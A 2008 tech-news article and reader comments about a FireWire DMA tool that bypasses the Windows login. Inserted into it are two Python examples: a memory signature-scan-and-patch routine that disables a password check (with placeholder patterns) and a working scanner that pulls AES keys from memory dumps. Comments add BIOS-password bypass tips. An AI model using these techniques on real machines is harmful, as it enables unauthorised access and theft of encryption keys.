53 comment(s) - last by lexluthermiest.. on Mar 14 at 3:11 PM

New Zealand hacker releases source code to utility that reads password directly from memory

Adam Boileau, the New Zealand hacker, has released the source code to a utility he wrote in 2006 that exploits a little-known feature of the FireWire (IEEE 1394) specification to bypass the Windows logon and unlock dialog on any PC with a FireWire port.

The tool is a simple 200-line Python script. It relies on a FireWire feature that lets a device on the bus read and write the computer's memory directly, without the operating system's involvement. By locating the place in memory where Windows reliably keeps its password-validation code, Boileau's script overwrites that code with a small patch, so the password check is skipped entirely and any password is accepted.
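To show the two halves of that technique in working code, here is an added example (not Boileau's script, which this page does not reproduce): it scans a memory image for a byte signature of the password-check routine and then overwrites the conditional jump that follows the compare. The DMA channel is replaced by an in-memory `MemoryBackend` stand-in; the signature `8B 45 ?? 3B C3 75 ??`, the patch offset and the bytes planted by `build_image()` are constructed for this example and are not the real Windows byte patterns.

```python
"""Signature scan and in-place patch over a memory image.

Added example, not code from the page. The FireWire/1394 DMA channel is
replaced by MemoryBackend (a bytearray); SIGNATURE, PATCH_OFFSET and the
bytes planted by build_image() are constructed placeholders, not the real
Windows password-check code.
"""


class MemoryBackend:
    """Stand-in for a physical-memory reader/writer on a DMA-capable bus.

    A real backend would issue 1394 read/write requests against the
    target's physical address space; here 'physical memory' is a bytearray.
    """

    def __init__(self, image: bytearray):
        self.image = image

    def size(self) -> int:
        return len(self.image)

    def read(self, addr: int, length: int) -> bytes:
        return bytes(self.image[addr:addr + length])

    def write(self, addr: int, data: bytes) -> None:
        self.image[addr:addr + len(data)] = data


# Constructed pattern: mov eax,[ebp+??]; cmp eax,ebx; jne ??   ('??' = wildcard)
SIGNATURE = "8B 45 ?? 3B C3 75 ??"
PATCH_OFFSET = 5            # the 'jne rel8' sits 5 bytes into the signature
PATCH_BYTES = b"\x90\x90"   # nop; nop -> always fall through to the success path


class PatchError(Exception):
    pass


def parse_signature(text: str):
    """'8B 45 ?? 74' -> [0x8b, 0x45, None, 0x74]; None matches any byte."""
    return [None if tok == "??" else int(tok, 16) for tok in text.split()]


def find_signature(mem: MemoryBackend, sig, window: int = 4096):
    """Return every address where sig matches, reading window-sized chunks.

    Each read is extended by len(sig)-1 bytes so a pattern straddling a
    chunk (or page) boundary is still found, and match starts are limited
    to the first 'window' bytes so no hit is reported twice.
    """
    n = len(sig)
    hits = []
    for base in range(0, mem.size(), window):
        chunk = mem.read(base, window + n - 1)
        for i in range(min(window, len(chunk) - n + 1)):
            if all(s is None or chunk[i + j] == s for j, s in enumerate(sig)):
                hits.append(base + i)
    return hits


def patch_password_check(mem: MemoryBackend, sig_text: str = SIGNATURE,
                         offset: int = PATCH_OFFSET, patch: bytes = PATCH_BYTES,
                         window: int = 4096):
    """Locate the check, patch it, and return (patched_addr, original_bytes).

    Refuses to write unless the signature is unique: zero hits means the
    target is not what we expected, several hits means we cannot tell which
    copy is live, and patching the wrong one can crash the target.
    """
    hits = find_signature(mem, parse_signature(sig_text), window)
    if len(hits) != 1:
        raise PatchError(f"expected exactly one match, got {len(hits)} at {hits}")
    target = hits[0] + offset
    original = mem.read(target, len(patch))    # keep for restoring later
    mem.write(target, patch)
    if mem.read(target, len(patch)) != patch:  # a DMA write can silently fail
        raise PatchError("read-back mismatch after write")
    return target, original


def build_image(size: int = 8192, positions=(4093,)) -> bytearray:
    """Constructed 'memory image': int3 padding with the target code planted
    at the given offsets (the default straddles the 4 KiB boundary on purpose)."""
    img = bytearray(b"\xcc" * size)
    code = bytes.fromhex("8b45083bc3750a")  # mov eax,[ebp+8]; cmp eax,ebx; jne +0x0a
    for pos in positions:
        img[pos:pos + len(code)] = code
    return img


if __name__ == "__main__":
    mem = MemoryBackend(build_image())
    addr, saved = patch_password_check(mem)
    print(f"patched {saved.hex()} -> {PATCH_BYTES.hex()} at {addr:#x}")
```

The unique-hit rule is the check that matters on a real target: a pattern this short also turns up in other loaded modules, and writing two NOPs into the wrong one crashes the machine instead of unlocking it. Keeping `original` and writing it back afterwards is what separates a demonstration from leaving a permanently unlocked box behind.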

Boileau says he decided to release the script now, two years after he first demonstrated it, because Microsoft had not acted to patch the vulnerability. Boileau considers his tool a “party-trick demo script that's been lying around my [home folder] for two years gathering dust,” and considers it “a pity to write code and have no one use it.”

“Besides,” says Boileau, “according to Microsoft's definition, it never was a Security Vulnerability anyway – screensavers and login prompts are … about the Feeling of Security.”

Boileau also notes that he has seen others modify the script to defeat Windows Vista’s password check, and use a laptop’s PCMCIA slot to insert a FireWire card and attack a laptop with no built-in port, once Windows had automatically installed the card’s drivers.

It’s important to note that FireWire’s provision for direct memory access (DMA) exists for legitimate reasons: it is what makes external devices fast, and it is what makes FireWire usable as a debugging channel. A sizable share of today’s software checks for an attached debugger and behaves differently, or refuses to start, when it finds one. Those checks look for debuggers the operating system knows about; a device reading memory over the bus is invisible to them.

FireWire ports are therefore usable as high-speed debugging devices, letting developers and attackers alike passively watch any region of a computer’s memory and change it where they choose, whether that means patching out a password check or correcting the data a misbehaving program is working on. The same access lets a forensic investigator, or a thief, pull an encrypted hard drive’s decryption key straight out of RAM while the machine is running, because full-disk encryption software has to keep the key in memory in order to use it.
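What “grab the decryption key directly from memory” looks like in practice, as an added example rather than anything from the article or from Boileau’s tool: an AES-128 key in use is normally accompanied in RAM by its expanded 176-byte key schedule, and the schedule is a deterministic function of the key, so a scanner can treat every 16-byte window of a memory dump as a candidate key, expand it, and compare the result with the bytes that follow. The memory image below is constructed (seeded pseudo-random filler with the schedule of the FIPS-197 example key planted at offset 5000); a dump taken over a DMA channel would be substituted for it.

```python
"""Find AES-128 keys in a memory image by locating their expanded key schedule.

Added example, not from the page. The image is constructed; a real run would
feed it a physical-memory dump (for instance one read over a DMA channel).
"""
import random


def _gf_mul(a: int, b: int) -> int:
    """Multiply in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = (a << 1) ^ (0x11B if a & 0x80 else 0)
        b >>= 1
    return r


def _rotl8(x: int, n: int) -> int:
    return ((x << n) | (x >> (8 - n))) & 0xFF


def _build_sbox():
    """AES S-box: multiplicative inverse in GF(2^8) followed by the affine map."""
    inv = [0] * 256
    for a in range(1, 256):
        if inv[a]:
            continue
        for b in range(1, 256):
            if _gf_mul(a, b) == 1:
                inv[a], inv[b] = b, a
                break
    return [inv[x] ^ _rotl8(inv[x], 1) ^ _rotl8(inv[x], 2)
            ^ _rotl8(inv[x], 3) ^ _rotl8(inv[x], 4) ^ 0x63 for x in range(256)]


SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]
SCHEDULE_LEN = 176  # 11 round keys * 16 bytes for AES-128


def _next_word(w_prev4: bytes, w_prev1: bytes, rnd: int) -> bytes:
    """w[i] for i % 4 == 0:  w[i-4] ^ SubWord(RotWord(w[i-1])) ^ Rcon[rnd]."""
    t = bytes(SBOX[b] for b in w_prev1[1:] + w_prev1[:1])
    t = bytes((t[0] ^ RCON[rnd],)) + t[1:]
    return bytes(x ^ y for x, y in zip(w_prev4, t))


def expand_key(key: bytes) -> bytes:
    """FIPS-197 key expansion: 16-byte key -> 176-byte schedule."""
    assert len(key) == 16
    w = [key[i:i + 4] for i in range(0, 16, 4)]
    for i in range(4, 44):
        if i % 4 == 0:
            w.append(_next_word(w[i - 4], w[i - 1], i // 4 - 1))
        else:
            w.append(bytes(x ^ y for x, y in zip(w[i - 4], w[i - 1])))
    return b"".join(w)


def find_aes128_keys(image: bytes):
    """Return [(offset, key)] for every exact AES-128 schedule in image.

    The cheap test (does w[4] follow from w[0..3]?) rejects almost every
    offset before the full 176-byte expansion is attempted. Exact match only:
    a dump taken from decaying RAM would need an error-tolerant variant.
    """
    found = []
    for off in range(0, len(image) - SCHEDULE_LEN + 1):
        if image[off + 16:off + 20] != _next_word(image[off:off + 4],
                                                  image[off + 12:off + 16], 0):
            continue
        key = bytes(image[off:off + 16])
        if expand_key(key) == image[off:off + SCHEDULE_LEN]:
            found.append((off, key))
    return found


FIPS_KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")  # FIPS-197 A.1 example


def build_image(size: int = 16384, key_offset: int = 5000,
                decoy_offset: int = 9000) -> bytes:
    """Constructed memory image: seeded filler, the schedule of FIPS_KEY at
    key_offset, and the bare 16 key bytes (no schedule) at decoy_offset."""
    rng = random.Random(1394)
    img = bytearray(rng.randrange(256) for _ in range(size))
    img[key_offset:key_offset + SCHEDULE_LEN] = expand_key(FIPS_KEY)
    img[decoy_offset:decoy_offset + 16] = FIPS_KEY
    return bytes(img)


if __name__ == "__main__":
    for off, key in find_aes128_keys(build_image()):
        print(f"AES-128 key at {off:#x}: {key.hex()}")
```

The bare key bytes at the decoy offset are not reported, which is the point of the method: on their own, 16 bytes of key look like any other 16 bytes of RAM, and it is the redundancy of the schedule that makes the key recognisable. A scan over a DMA read of the running machine, where nothing has decayed, is the easy case; the error-tolerant search is only needed once the RAM has started to lose bits.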

Also important is that the same technique has been shown to work on other operating systems, including Mac OS X and Linux; some people have even run FireWire DMA attacks on the fly from modified iPods.

Conventional security wisdom holds that a computer in an adversary’s physical possession is essentially lost, and that with enough time the protections on a physical machine will be subverted. For computers with a FireWire port, the time needed is about as long as it takes to plug in a cable.



By Beefy6969 on 3/7/2008 9:47:28 PM , Rating: 2
aww shiet...i better enable my bios password then. LOL

RE: sigh
By sandytheguy on 3/7/2008 10:17:45 PM , Rating: 5
Then I'll just reset your cmos.

RE: sigh
By sgtdisturbed47 on 3/7/2008 10:26:28 PM , Rating: 2
Then I'll just keep the computer in a vault room, like they do with servers in internet PC cafes. LOL, not really, but seriously, it's very easy to get around Windows security features.

RE: sigh
By eman7613 on 3/8/2008 12:16:11 AM , Rating: 2
Actually, if it's a laptop, resetting the CMOS won't do anything, although buying a new BIOS chip and switching them out will.

RE: sigh
By zshift on 3/8/2008 10:30:08 AM , Rating: 2
Actually, that's not completely true. I work at Best Buy and we had a customer that returned a laptop because it "didn't work." Turns out they apparently forgot their BIOS password, so I opened the laptop and reset the CMOS and, lo and behold, the boot password was gone.

RE: sigh
By falacy on 3/8/2008 10:35:50 AM , Rating: 2
Then it wasn't a Toshiba.

Stinking Toshiba had to be tough on that sort of thing by installing a secondary IC that stores the password but doesn't come with a reset feature. Replacing the IC fixes the issue, but it's a surface-mount IC and it's teeny tiny!

RE: sigh
By mindless1 on 3/8/2008 9:50:28 PM , Rating: 2
There's bound to be a way it can be done, they'd leave a backdoor long before having to desolder surface mounted PROMs just to wipe a password (for their own benefit even if they don't care about the owner).

RE: sigh
By Korvon on 3/9/2008 2:08:03 PM , Rating: 2
There are back doors to most every laptop. Older Toshibas' BIOS passwords can be bypassed by making a loopback on the parallel port. Several manufacturers have passwords that will bypass whatever you put in, just in case you forget yours and call support. :P

RE: sigh
By kextyn on 3/8/2008 8:11:48 PM , Rating: 2
It depends on the laptop. But many of them store the passwords in a separate chip now that would require some physical hacking to read the chip or replacement of the motherboard. Try getting into a Thinkpad that has all of the IBM/Windows standard passwords set (power on, BIOS supervisor, hard drive, etc.).

RE: sigh
By Samus on 3/9/2008 2:18:07 PM , Rating: 3
IBM Security Chips fix this. Among many other things, they monitor the memory space windows stores passwords in for phishing utilities like this script.

Once Again
By Flunk on 3/7/2008 11:01:00 PM , Rating: 5
Once again, there is not a computer system made with no security vulnerabilities. If you notice, this is actually the same issue that was reported with Mac OS the other day.

RE: Once Again
By Master Kenobi on 3/7/2008 11:59:03 PM , Rating: 4
This exploit actually works on any operating system. It exploits a flaw in the Firewire driver that allows it to interact with the system. Mac OSX, Windows, Linux, etc... The problem is with firewire. Now to put this into perspective, utilities have been available for years to 1-2 KO windows passwords (See: ERD Commander and various Ultimate Boot CD utilities).

Now to take a cheap shot though, Firewire is largely a product of Apple (some other vendors were involved later on, but Apple was the starter and biggest supporter of it). Apple has always been known for the security through obscurity model, and Firewire seems to fit in quite well :P

RE: Once Again
By dare2savefreedom on 3/8/2008 1:25:50 AM , Rating: 4
u r FOS

al gore created firewire.

Next you're going to tell me Apple invented the internet and the open standard protocol that it uses, known as AppleTalk.

RE: Once Again
By winterspan on 3/8/08, Rating: -1
RE: Once Again
By MAIA on 3/11/2008 1:50:37 PM , Rating: 3
Yep, i saw al gore creating firewire as well. It's like a wire with lots of fire.

He did the same thing with a wall, and called it firewall ...

RE: Once Again
By Polynikes on 3/8/2008 11:28:08 AM , Rating: 2
Apple was the starter and biggest supporter of it). Apple has always been known for the security through obscurity model, and Firewire seems to fit in quite well :P

Ain't that the truth. Mac OS is much more secure than Windows! Steve Jobs & Co would never mislead the public.

RE: Once Again
By Hare on 3/8/08, Rating: -1
RE: Once Again
By TomZ on 3/8/2008 1:29:00 PM , Rating: 3
And yes. If you look at the track record of Mac OS X vs. Windows it's quite clear that it's more secure.

Are you making a joke? Or are you just unaware of the security statistics of the current versions of OSX and Windows (Vista)? Vista is trouncing OSX.

RE: Once Again
By Hare on 3/8/2008 2:07:54 PM , Rating: 1
Leopard was just announced so it's a bit difficult to make any direct comparisons between latest operating systems. I was more or less comparing Mac OS X vs Win XP/Vista (long term).

I personally use Vista 95% of the time (like it a lot) and consider it as secure as or more secure than Mac OS X. The problem is that the OS itself doesn't make a system either secure or insecure (when the system is used by the average consumer). Unfortunately viruses and malware target mainly Windows machines, so problems in Mac OS X are rarely exploited (this is something that you can't find in Secunia statistics). There's hardly any malware for Macs (open windows don't matter that much if you are living in a nice neighbourhood).

Security statistics for 2007
Mac OS X (26 advisories, none critical)
Vista (17 advisories, few critical/extremely critical)
Windows XP (30 advisories, many critical/extremely critical)

By GTVic on 3/8/2008 4:49:58 AM , Rating: 2
Would it work on a domain password or just local account passwords?

RE: Domain
By rninneman on 3/8/2008 10:34:58 AM , Rating: 2
It works on any password that is stored in RAM. So basically it works on just about everything.

RE: Domain
By zshift on 3/8/2008 10:37:26 AM , Rating: 2
I'm pretty sure that this trick wouldn't work for domains because of the fact that the domain password isn't stored on the client, so the script would be uselessly searching for a password that doesn't exist (on the current system). you'd have to run the script on the machine hosting passwords for the domain.

RE: Domain
By isorfir on 3/8/2008 3:53:01 PM , Rating: 1
I don't think that's true, since I can log into the domain accounts on my office laptops while not connected to the domain, so it has to be stored on the client.

RE: Domain
By Yawgm0th on 3/8/2008 7:28:39 PM , Rating: 1
If you have a local account created on that computer, even if for use in a domain, the username and password will be stored in the local SAM.

Unless you log into a domain using roaming profiles and do not have the domain account created locally on the PC and you have not logged onto that PC since the last time the RAM was cleared (in this case, you most likely would have had to turn the PSU off or disconnect power), the user account should be vulnerable to this attack.

RE: Domain
By mcmilljb on 3/8/2008 9:23:25 PM , Rating: 2
Wrong. Domain accounts are stored on the Domain Controller, not locally. You won't be able to get the information unless the script knows where to find the password stored temporarily for that session. You can disable caching of the Domain account credentials, which will prevent anyone that has logged in to the domain from logging in again unless the person has network connectivity. SAM is not used locally for Domain accounts. When you're using a Domain, the password is hashed before being sent to the DC, so I assume you would need to be able to undo the hash to even read the password. Plus the DC sends access tickets, which allow it permission to resources.

RE: Domain
By TomCorelis on 3/9/2008 12:11:49 AM , Rating: 2
It bypasses the password scheme entirely. I'm not sure whether it would create a proper login token for a domain.

RE: Domain
By jimbojimbo on 3/10/2008 1:01:50 PM , Rating: 2
If you've read the article you'd know that it won't matter where the hell the password is stored. If your computer is still on since the last time you logged in, your password is in the memory which this vulnerability takes advantage of. You could be logging into a domain hosted on Mars for all it cares.

Physical Control of Computer
By TomZ on 3/8/2008 7:38:40 AM , Rating: 4
If a hacker has physical control of your computer, i.e., they can plug something into the FireWire port, then you don't really have security, do you?

After all, that person could also use all other kinds of attacks on the machine, such as boot disks, cloning the HDD, or even stealing the computer.

Bottom line, you need to have physical control of your computer in order to have any kind of security.

RE: Physical Control of Computer
By walk2k on 3/8/2008 12:03:51 PM , Rating: 3
right... if they can get close enough to stick something in the fw port they could just smash it with a hammer or take a wizz in the cdrom hole or something.

RE: Physical Control of Computer
By mcmilljb on 3/8/2008 9:27:55 PM , Rating: 2
Actually you can disable the use of USB and FireWire in an Active Directory environment (locally too, but that's fun to do for lots of computers). Plus I don't need that tool to control that computer; I use the tool to get the password. Getting the password is important. Physical access control is the key to controlling your computer's security, because you can do lots of things to a computer when it's in your hands.

By mindless1 on 3/8/2008 10:07:44 PM , Rating: 2
Security is a set of practices meant to deter based upon risk, never an absolute.

Using a FireWire port is far faster and easier than a boot disk, HDD clone, or stealing the computer. It might be the data thieves' ideal method to get in, copy, and get out fast, with either no detection or at least having acquired the target and be leaving the area.

It doesn't have to be the only way to get into a system, just a way someone else didn't anticipate, because in the real world most computers that have a certain level of security are not guarded at Fort Knox.

By Sunday Ironfoot on 3/8/2008 5:17:25 AM , Rating: 2
I'm pretty sure this wouldn't be able to beat Windows BitLocker, or any other 'full' hard drive encryption technology, correct me if I'm wrong?

RE: BitLocker?
By Hare on 3/8/2008 8:19:39 AM , Rating: 2
It doesn't matter how much is encrypted since only your RAM is being read. I'm not 100% sure if the firewire hack works with bitlocker but I think it actually does.

At least the ram swap technique works

"Researchers claim they cracked an array of commonly-used encryption programs, including Microsoft's BitLocker, Apple's FileVault, TrueCrypt, and dm-crypt."

Basically the firewire trick is the same. It enables a user to gain direct access to RAM and read the encryption keys.

RE: BitLocker?
By winterspan on 3/8/2008 8:13:58 PM , Rating: 2
That RAM swap thing is crap, since you don't have any time to actually do it without being able to deep freeze the RAM to slow the data decay. And you can't just dip it into liquid nitrogen without having it crack and explode.

RE: BitLocker?
By Hare on 3/9/2008 5:21:26 AM , Rating: 2
You can also use a usb drive (minilinux) to boot the machine and simply read the memory from there. There's no need to even open the case.

RE: BitLocker?
By Etern205 on 3/8/2008 4:49:25 PM , Rating: 2
Here is another link and BitLocker is defeated...

By diegoaac on 3/8/2008 12:27:22 AM , Rating: 2
That is exactly the reason why the MacBook Air doesn't have FireWire: cheers to Apple for creating the most secure computer in the world!!!!

That trick is almost as old as the FireWire specifications. What I really want to see is some article saying something like: Chinese dissidents hack the world's top 10 supercomputers using only an iPod with a custom FPGA InfiniBand interface (just because that kind of article always includes iPods for some strange reason).


By SlyNine on 3/8/2008 1:00:14 AM , Rating: 2
At least it's harder then deleting a .PWL file.

By dare2savefreedom on 3/8/2008 1:29:30 AM , Rating: 2
I can't see where the link for the tool is...
someone help xD

Put in to good use?
By Etern205 on 3/8/2008 4:42:57 PM , Rating: 2
This tool can be helpful for computer technicians who are trying to fix computers where a customer comes in and has forgotten their password.

In XP if you forgot your password, there is a back door way to bypass it, and since almost everyone knew about it, M$ changed it with Vista.

Breadth of Exploit
By habibo on 3/10/2008 4:46:49 PM , Rating: 2
Does this affect Speak 'N' Spells, too? That's where I do the majority of my computing these days...

By vladio on 3/10/2008 5:56:53 PM , Rating: 2
We badly need a new law.
If MS (or any other company) makes $$$ from their product,
they must be responsible!!
I mean accountable for their stuff
(products, services, etc.) and they have to pay for it
if they sell "crap" [pardon my French].
How about...
$1 million the first day, $2 million the second, $4 million the 3rd day,
and so on?
If Merk started selling "crap"... there would be a response from the authorities [and there should be!!].
Why not apply the same rules?!

Not a problem...
By Bonrock on 3/7/08, Rating: -1
RE: Not a problem...
By napalmjack on 3/7/2008 11:13:21 PM , Rating: 2
Sure about that?

RE: Not a problem...
By ProviaFan on 3/7/2008 11:22:16 PM , Rating: 4
Anyone who works with digital audio or video knows that you are clueless.

RE: Not a problem...
By lexluthermiester on 3/14/2008 3:11:11 PM , Rating: 2
I don't use FireWire and never will, and I work with audio and video all the time. USB can be found on every machine sold today, whereas FireWire is not so widespread.

RE: Not a problem...
By omnicronx on 3/7/2008 11:29:18 PM , Rating: 2
Many laptops include firewire.. I think every Mac includes one.

RE: Not a problem...
By Master Kenobi on 3/8/2008 12:01:07 AM , Rating: 2
All Macs, Sonys, and many HP/Dell systems include a 4-pin FireWire port, with desktop models possibly including a 6-pin port.

RE: Not a problem...
By JoshuaBuss on 3/8/2008 1:39:58 AM , Rating: 2
not the macbook air.. hehe

RE: Not a problem...
By omnicronx on 3/8/2008 1:19:46 PM , Rating: 2
Exactly, and this is why it should be a big concern. Looking at many workplaces, most people in high positions have laptops. Think about the sensitive information that could be pulled without needing hardcore equipment.

RE: Not a problem...
By Ochophosphate on 3/8/2008 9:12:36 AM , Rating: 2
as well as use a laptop’s PCMCIA port to plug in a Firewire card and attack the laptop after Windows auto-installed the card’s drivers.

Even without an available firewire port, looks like they can just add their own. Sounding like more of a problem yet?

RE: Not a problem...
By Melted Rabbit on 3/8/2008 1:39:54 PM , Rating: 2
This is less of a flaw on the part of Apple and Firewire as much as a design flaw in the PCI standard which Intel designed. There is no way to fix this flaw with PCI easily, as the PCI standard has no kind of security system. By default, all PCI peripherals can have read/write access to the entire memory space of the computer. This exploit would be possible, but harder to do, with flash and an FPGA on a PCI card, and with no Firewire involved. Also systems with just PCI and those with PCI and PCI Express are both vulnerable to this exploit.

One workaround for Firewire is to let the Firewire bus access a smaller virtual address space instead of the entire actual address space of the computer. Then this particular attack could be avoided. The PowerMac G5 and Sun workstations fix the flaw in this way. I do not know for sure, but this would probably require quite a bit of reworking and extra logic for both the North Bridge and Memory Controller on an x86 PC to make this fix work. Intel would like to see Firewire dead, so don't expect this fix on an Intel chipset or processor, ever. AMD probably doesn't have the engineers to add a fix like this to their offerings.

The best solution for this problem with PCI is to come up with a new bus standard, not software compatible with PCIe, that has a security model. It should also address some of the intentional shortcomings of PCIe, like being a peer-to-peer bus instead of the master-slave setup currently present in PCIe. It should also add the ability to route between nodes, which PCIe also cannot do. Intel intentionally left the last two mentioned features out to make a general purpose PC the only feasible option for computing, instead of smaller, specialized computers being an option for a user.

RE: Not a problem...
By DragonMaster0 on 3/9/2008 8:29:09 PM , Rating: 2
I do not know for sure, but this would probably require quite a bit of reworking and extra logic for both the North Bridge and Memory Controller on an x86 PC to make this fix work.

I don't know any north bridges with on-chip firewire (maybe they do now, but I doubt). Firewire is connected to a separate controller(usually a VIA or TI) on the PCI bus, just like a network chip. These would need to block the RAM area in question.

Intel would like to see Firewire dead

Obviously, since it doesn't load the CPU...


Copyright 2016 DailyTech LLC.